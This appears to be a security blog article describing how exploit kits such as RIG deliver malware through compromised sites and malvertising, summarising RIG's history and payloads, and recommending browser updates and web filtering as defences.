Exploit kits are no longer as popular as they once were, but they are still being used as a vehicle for distributing malware. An exploit kit is a program loaded on an attacker-controlled website that is able to scan for vulnerabilities when visitors land on the site and exploit those vulnerabilities to silently deliver malicious payloads. Exploit kits were first detected in 2006 and were once one of the most common ways that malware was distributed, typically exploiting vulnerabilities in browsers and browser applications such as Adobe Flash, Microsoft Silverlight, Java, and Active X to deliver information stealers, remote access Trojan’s and ransomware.
Since 2017, exploit kits have been in decline, in a large part due to Adobe Flash reaching end-of-life. Adobe Flash vulnerabilities were among the most exploited vulnerabilities. Today, exploit kits are still used for distributing malware, most commonly crypto-mining malware, although under the exploit-kit-as-a-service model, they are used to deliver a variety of payloads.
Today, some of the most successful exploit kits are now fileless. They write no files to the disk, instead they load malicious code into the memory. Traffic to these exploit kits is most commonly generated through malvertising – malicious adverts displayed on legitimate websites, either through the third-party ad blocks that website owners use to increase revenue or through compromised websites.
In recent years, the RIG exploit kit has been one of the most successful. The RIG exploit kit first appeared in 2014 and was active until 2017, when a coordinated operation led by RSA Research successfully shut down and removed its infrastructure. According to the researchers who were part of that takedown, the operators of RIG had successfully hacked hundreds of hosting accounts – mostly on GoDaddy – and hid their malicious code inside hidden subdomains – shadow domains –to avoid detection. The RIG exploit kit was loaded onto tens of thousands of active shadow domains. The operators are thought to have gained access to those hosting accounts by conducting phishing attacks to steal credentials and through brute force attacks on hosting accounts with weak passwords.
A compromised site has malicious code injected that loads JavaScript from a malicious domain. When a visitor lands on the site, a check is performed to see if the user should be targeted – such as being in the right geographical region – then the exploit will be loaded. If successful, malicious code will be written to the user’s disk and executed, and the code will deliver the required payload. Exploit kits are offered to cybercriminal groups under the exploit-as-a-service model, where they either rent access or pay to have their payloads delivered. Attacks are automated and aside from a user visiting a malicious website hosting the exploit kit, no user interaction is required to deliver malware.
The RIG exploit kit was rebuilt after the takedown and was resurrected in 2021, then temporarily shut down, before returning in 2022 with a new exploit arsenal. According to researchers at the cybersecurity firm PRODAFT, the RIG exploit kit has never been more successful, achieving a successful exploitation rate of 30% in 2022. The exploit kit is being updated weekly or monthly with new exploits and has been used to deliver a range of payloads including banking Trojans such as Dridex and IdecID, information stealers such as Racoon stealer and AzoRult, malware downloaders such as WastedLoader, and ransomware such as Royal. The most successful recent exploit was for the Internet Explorer vulnerability – CVE-2021-26411. RIG remains highly active, with the researchers reporting a 22% successful exploitation rate in the past two months.
Exploit kits exploit vulnerabilities in browsers and browser applications, so the best defense is to ensure browsers are kept up to date; however, employees often install browsers and plug-ins without the knowledge of the IT department, and these may never be updated. As an additional protection, businesses should consider a web filter, which can block the adverts that drive traffic to malicious websites, block access to those sites through filtering controls, and also block malware downloads.